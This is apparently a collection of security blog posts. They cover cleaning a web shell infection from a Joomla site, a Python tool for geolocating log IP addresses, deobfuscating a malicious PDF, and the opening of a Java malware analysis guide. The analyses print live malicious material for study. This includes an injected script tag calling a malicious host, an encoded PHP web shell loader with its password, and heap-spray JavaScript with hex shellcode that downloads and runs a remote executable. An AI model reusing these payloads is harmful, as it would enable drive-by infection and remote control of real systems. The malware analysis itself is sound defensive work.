Access: (0644/-rw-r--r--) Uid: (10369090/ bbaskin) Gid: (45673/pg144238)
Access: 2010-02-25 20:37:47.000000000 -0800
Modify: 2011-04-02 23:35:38.000000000 -0700
Change: 2011-04-02 23:35:38.000000000 -0700

A spot check across other folders showed similar infections. A grep for "globalpower" showed that it only infected .htm and .html files. I then ran the following script to search for the infection code and remove it.


grep -Rl "globalpower" * | xargs sed -i 's|<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\\n||g'

In part: grep finds the infected files and passes the filename to sed. Sed then does a global find & replace (s/old/new/g). Since the search query uses a '/', I just used '|' for sed instead.  This basically looks for that infection code and replaces it with nothing, thus removing it.

Now that we have a known date and time, and assuming that this is not a stomped date, we can focus on the network logs to see what occurred during that time. When reviewing the Apache logs I found the following two lines that were the sole activity during that time.


66.96.128.62 - - [02/Apr/2011:23:35:32 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 162 "-""-"
66.96.128.62 - - [02/Apr/2011:23:35:37 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 433 "-""-"

These files show the offending IP address, verifies the date and time but, more importantly, shows the initial malware script that caused the problems.  It also shows two consecutive connections, five seconds apart. The first connection sent 162 bytes of data back to the attacker and the second sent 433 bytes. The file still existed on the system. I gathered the file inode data below and then renamed it and chmod'd it to 400 (r--------) to avoid any additional execution. At this point the date sunk in. February 24th? The timestamps could be stomped, or the file really could've been uploaded at that point. My access logs do not go that far back, but I have to assume the worst.

$ stat aarika_friend.php
File: `aarika_friend.php'
Size: 28278 Blocks: 56 IO Block: 4096 regular file
Device: 811h/2065d Inode: 113164428 Links: 1
Access: (0644/-rw-r--r--) Uid: (10369090/ bbaskin) Gid: (45673/pg144238)
Access: 2011-02-24 00:31:36.000000000 -0800
Modify: 2011-02-24 00:31:36.000000000 -0800
Change: 2011-02-24 00:31:36.000000000 -0800
This PHP file was encoded into an unreadable format that we'll touch on later. For now, the hole needs to be patched. I see the first big issue here is that the file exists within a folder called "/main/1.5.back/tmp". When I was doing some obscure testing over a year ago I set the tmp folder in my Joomla to 777 permissions. I then neglected to reset them back. Worst. Mistake. Ever. When I performed a major Joomla update on December 31, 2010, I copied the entire directory to a backup and created a new one. This wide open directory sat there for months. How did the file end up in that particular location? I don't know at this point. I change permissions on the folder for now. I also check all other folders to ensure that none were left open.
To see if any other files were accessed, I scan my folder tree to find any file modified and created within the last 90 days by running:

$ find ./ -mtime 90
$ find ./ -ctime 90

This search did not uncover any additional files.

It was an embarrassing hit, but I did eventually clean the system up. From point of notification to remediation was about 10 minutes. And at least I hold no PII on the server ;)

Malware analysis

For the time, I kept a copy of infected files. They were moved outside of the public web folder to a place where I can later analyze them. I focused on the aarika_friend.php. I copied the code to a VM environment running Linux. This file included the following data (some portions reduced for obvious reasons)


<?php$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8bb1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b(""$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7
...
CgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));$_8b7b1f56();?

Looking at the low-ASCII structure of the data, and the trailing "==", it's easy to see this is Base64 encoded. I then removed the header up to the "JGs9..." and the tail after "==" and ran it through a Base64 decoder. It resulted in the following data (again, some portions removed)

$k=143;$m=explode(";","234;253;253;224;253;208;253;234;255;
...
175;175;175;242;130;133;242;175;");$z="";foreach($mas$v)if($v!="")$z.=chr($v^$k);eval($z);
The explode() and chr() PHP functions here are the key. Notice the first variable is k=143. Explode() will take each 3-digit number (splitting on the semicolon) and XOR (^) the number by 143, then convert the result to an ASCII character (chr(number^143)). We can test this manually to test:

$ php -r 'echo(chr(234^143).chr(253^143).chr(253^143).chr(224^143).chr(253^143)."\n");'

error


Now we know that we're seeing appropriate ASCII text, which includes the word 'error'. The foreach() command goes through each 3-digit number, converts it to an ASCII character, and appends it to a master variable string called $z. At this point I'm going to edit the code to remove the very last command: eval($z);
Instead, I'll replace it with:

$bb=fopen('malware.txt','w');fwrite($bb,$z);fclose($bb);

I then add the necessary PHP header and footer to the file: "<php " and "?>". After making the edits I double check, then triple check, to ensure that I removed the eval() statement. Then I run:


php -f aarika_friend.decoded.php
It creates a new output called 'malware.txt' which contains the raw code. Rather than display it here, I'll point you to a pastebin archive of the code.  Pastebin gives a safe environment to view the code while performing syntax highlighting to make it easier to read.
So let's analyze a bit of what's going on in this code.  By looking solely at the HTML sections we can see a basic web structure in place. The script creates three two boxes for Check (p) and cmd. The attacker types in their command into the cmd box and a verification phrase into the Check box.
Before executing the command the code first looks to see if the check phrase, stored as a variable named 'p', is correct.

if(md5($_COOKIE["p"])!="ca3f717a5e53f4ce47b9062cfbfb2458"){

If the MD5 hash of the phrase matches the value above then the specified command executes. The verification value that matches that MD5? It's "showmustgoon!"


 $ echo -n showmustgoon! | md5sum
ca3f717a5e53f4ce47b9062cfbfb2458 -

At this point, the rest is just an academic exercise. The exploit was found, the vulnerability was found, and all was remediated. It turned into a learning lesson for me and hopefully for you as well.




Geolocational Log Analysis: Think Globally, Act Locally

$
0
0

In many network environments the administrators and security engineers have an understanding of the full geographical scope and reach of their network. While some corporations have a global audience and expect traffic from the far reaches of the world, others are more localized and target a specific small region.

A health care provider for Alaska would monitor its network connections to ensure that network connections are limited to its main source of users, i.e. those in Alaska. An insurance company in St. Louis will see mostly traffic from IP addresses in Missouri, but Illinois as well, due to the city  being on the state line.

Occasionally, administrators may notice connections being made from Hawaii, Bermuda, or Italy, signifying users who are on vacation but are still wired in to their work. However, a long-term series of connections from a Eircom subscriber, Ireland’s largest ISP, should spark interest to the network administrator of a Seattle tax firm.

While anonymous web connections from global addresses are common, specific attention should be paid to such addresses being used to access password-protected areas of a corporation. This could include remote file access, VPN and web-based corporate email.

In such cases the logs from these applications, usually supplied in plain text or W3C format, contain details about transactions to include the remote IP address and the account name being authorized. In reviewing logs from various incident responses cmdLabs has found details to show that a short log review made on a daily basis could help smaller corporations determine quickly if a user account was compromised and accessed from a remote location.

For example, the log sample below from a Cisco ASA tracks VPN connections. The user “cmdLabs\bbaskin” was accessed via the IP address of 159.134.100.100 on 2 April, 2011, an IP that was traced back to Ireland. A few hours later the same account was accessed from an IP address in Austria.



Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-302013: Built outbound TCP connection 7823 for inside:10.10.10.50/389 (10.10.10.50/389) to NP Identity Ifc:192.168.1.1/1047 (192.168.1.1/1047)
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-104: AAA user authentication Successful : server = 10.10.10.50 : user = cmdLabs\bbaskin
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113009: AAA retrieved default group policy (DfltGrpPolicy) for user = cmdLabs\bbaskin
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113008: AAA transaction status ACCEPT : user = cmdLabs\bbaskin
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-734001: DAP: User cmdLabs\bbaskin, Addr 159.134.100.100, Connection Clientless: The following DAP records were selected for this connection: DfltAccessPolicy


For this small set of data it is trivial to query each IP address to determine its country of origin, netblock owner, and other details that would highlight unauthorized access. The problem arises when you have hundreds of thousands of such transactions in your daily log files.




One service that cmdLabs uses regularly is the IP to ASN WHOIS server run by Team Cymru. This server provides quick and easy access to country codes for a given IP address. However, it has two limitations: it requires Internet-access which is not readily available from a forensic workstation and to process a large bulk of IPs you have to use their Netcat process which only returns ASNs and not country codes. To overcome these limitations I've developed a simple solution that could process hundreds of thousands of IP addresses to determine country codes.

This solution is a small Python script called IP2CC that takes an IP address as input and outputs the originating country code for that IP. This solution requires three components:
  1. The free country code database located at http://www.maxmind.com/app/geolitecountry (updated monthly)
  2. Python API module to access this database located at https://github.com/appliedsec/pygeoip
  3. The ip2cc.py script. Downloadable at the end of this blog post.
The script allows for input to be given via the command line, stdin, or an input file. In normal use it will simply output the country code. With the –c or -t option the output will contain both the IP and country code in either a comma-separated version (CSV) or tab-separated (TSV) output, respectively.


python ip2cc.py –i -f <input file> [-c] [-t]

> python ip2cc.py -i 11.11.11.11
US
> python ip2cc.py -i 22.22.22.22 -c
22.22.22.22,US
> echo 33.33.33.33 | python ip2cc.py
US
> python ip2cc.py -f IP.txt -c
14.48.7.101,AU
12.51.21.19,US
10.61.14.9,Internal

In one use, we'll eliminate known intranet/extranet IP addresses and run the resulting list through IP2CC to produce a master list of foreign accesses. This script will run in Linux and OSX in conjunction with the native OS command line tools. For a Windows environment you will find additional capabilities by installing the necessary GnuWin32 components. For example, when reviewing a NCSA-formatted log with the IP address in the first field:

D:\> type in051611.log | egrep –v “^192” | gawk “{print $1}” | python ip2cc.py -t | egrep –v “US|Internal” | gawk -F\t "{print $1}" | sort | uniq > DailyForeignIPs.txt

D:\> for /F %i in (DailyForeignIPs.txt) do grep “%i” in051611.log >> DailyForeignConnections.txt

The first command above will save a simple text listing of all unique foreign IP addresses into a file for processing. The second line takes each IP address from that resulting file and compares it back against the logs to extract all lines that include its presence. The resulting DailyForeignConnections.txt can then be quickly reviewed to determine if any accounts were accessed from a foreign IP address.

Dealing with the VPN logs shown earlier, we'll change our command line a bit. Using the standard Cisco log file index as a source we can see that the log id of 734001 will show us the remote IP address of a user login. We'll search the log for that id and then parse out the IP address in the 15th field. An additional hindrance is that the IP address is appended with a comma, which we’ll remove with the ‘tr’ command.

D:\> type asavpn-051611.log | findstr "734001" | gawk “$15 !~ /^192/ {print $15}” | tr -d "," | python ip2cc.py –t | egrep –v “US|Internal” | sort | uniq > DailyVPNForeignIPs.txt

This is ultimately just a very simple Python script. In-house, we use it as a mere function within larger processes, but its simplicity allows for it to be used in a variety of result-tuning processes. Customization is easy. At times I'll make an offshoot of the script to process input from `uniq` command with the `-c` count option occasionally. The `uniq –c` adds a new column that specifies the total number of instances of that IP address which is useful when evaluating the persistence of a single IP amongst thousands. A few small changes to the Python will allow you to read this count and add it to the CSV output for easy integration into a spreadsheet.

Usage of a tool like IP2CC is a first step to opening an administrators eyes to traffic beyond their network. A good administrator or security engineer should monitor not only the traffic that flows across their network but also the perceived traffic that flows from a network’s outer nodes to the Internet. Monitoring for your company’s existence in spam black-lists, a malware rating on services like Web of Trust, and other indicators can give clues that an infection or intrusion may be underway within your network.

Downloads:
IP2CC Python Source Code v1.0

Malicious PDF Analysis: Reverse code obfuscation

$
0
0
I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

The email was received to my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it. The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, that contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained all integer numbers that were between 0 and 74. This is not standard shell code.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere where it is initialized. Instead, you see variables named "& # 000119;" and ""& # 000110;". These are the ASCII decimal values for "w" and "n" respectively. Additionally, mathematical operators, like "& lt;" are escaped as HTML "<". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But, what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters. By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that reference each individual character, each separated by a "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But, even with layer of obfuscation, a quick Python script makes short work of it:
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    result=""
    for i in arr.split("@"):result += cc[int(i)]
    print result
When run, voila! Our obfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two bytes equals the hexadecimal value for the binary character. Copying and pasting the data into a hex editor can convert it to binary.

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straight forward. It's a simple downloader with the URL in plain text (Similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well trained eye can see additional strings appear, typically as four bytes of op-code following by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move this 4-bytes of data into a memory register at X location"). A visual analysis shows the command line: "regsvr32 -s wpbt.dll", as well as a DLL call "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially instills a DLL into the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I did this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;1
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls I2() that makes a block of text that is "QUFB" 10,984 times.
_l10 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes refer to the file header of a TIFF graphic image. Oh, and those 10,984 "QUFB"'s? Those Base64 decode to "0x414141". That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically libTiff vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.

Java Malware - Identification and Analysis

$
0
0

DIY Java Malware Analysis


Parts Required:AndroChef ($) or JD-GUI (free), My Java IDX Parser (in Python), Malware Samples
Skill Level: Beginner to Intermediate
Time Required: Beginner (90 minutes), Intermediate (45 minutes), Advanced (15 minutes)

Java has once again been thrown into the limelight with another insurgence of Java-based drive-by malware attacks reminiscent of the large-scale BlackHole exploit kits seen in early 2012. Through our cmdLabs commercial incident response and forensics team at Newberry Group, I've had the opportunity to perform numerous investigations into data breaches and financial losses due to such malware being installed.
Based on my own experience in Java-related infections, and seeing some very lackluster reports produced by others, I've decided to write a simple How-To blog post on basic Java malware analysis from a forensic standpoint. Everyone has their own process, this is basically mine, and it takes the approach of examining the initial downloaded files, seen as Java cached JAR and IDX files, examining the first-stage Java malware to determine its capabilities, and then looking for the second-stage infection.

Java Cached Files

One critical step in any Java infection is to check for files within the Java cache folder. This folder stores a copy of each and every Java applet (JAR) downloaded as well as a metadata file, the IDX file, that denotes when the file was downloaded and from where. These files are stored in the following standard locations:
  • Windows XP: %AppData%\Sun\Java\Deployment\Cache
  • Windows Vista/7/8: %AppData%\LocalLow\Sun\Java\Deployment\Cache
This folder contains numerous subdirectories, each corresponding to an instance of a downloaded file. By sorting the directory recursively by date and time, one can easily find the relevant files to examine. These files will be found auto-renamed to a random series of hexadecimal values, so don't expect to find "express.jar", or whatever file name the JAR was initially downloaded as.

Java IDX Files


In my many investigations, I've always relied upon the Java IDX files to backup my assertions and provide critical indicators for the analysis. While I may know from the browser history that the user was browsing to a malicious landing page on XYZ.com, it doesn't mean that the malware came from the same site. And, as Java malware is downloaded by a Java applet, there will likely be no corresponding history for the download in any web browser logs. Instead, we look to the IDX files to provide us this information.

The Java IDX file is a binary-structured file, but one that is reasonably readable with a basic text editor. Nearly all of my analysis is from simply opening this file in Notepad++ and mentally parsing out the results. For an example of this in action, I would recommend Corey Harrell's excellent blog post: "(Almost) Cooked Up Some Java". This textual data is of great interest to an examiner, as it notes when the file was downloaded from the remote site, what URL the file originated from, and what IP address the domain name resolved to at the time of the download.

I was always able to retrieve the basic text information from the file, but the large blocks of binary data always bugged me. What data was I missing? Were there any other critical indicators in the file left undiscovered?

Java IDX Parser


At the time, no one had written a parser for the IDX file. Harrell's blog post above provided the basic text structure of the file for visual analysis, and a search led me to a Perl-based tool written by Sploit that parsed the IDX for indicators to output into a forensic timeline file at: Java Forensics using TLN Timelines. However, none delved into the binary analysis. Facing a new lifestyle change, and a drastic home move, I found myself with a lot of extra time on my hands for January/February so I decided to sit down and unravel this file. I made my mark by writing my initial IDX file parser, which only carved the known text-based data, and placed it up on Github to judge interest. At the time I wrote my parser, there were no other parsers on the market.




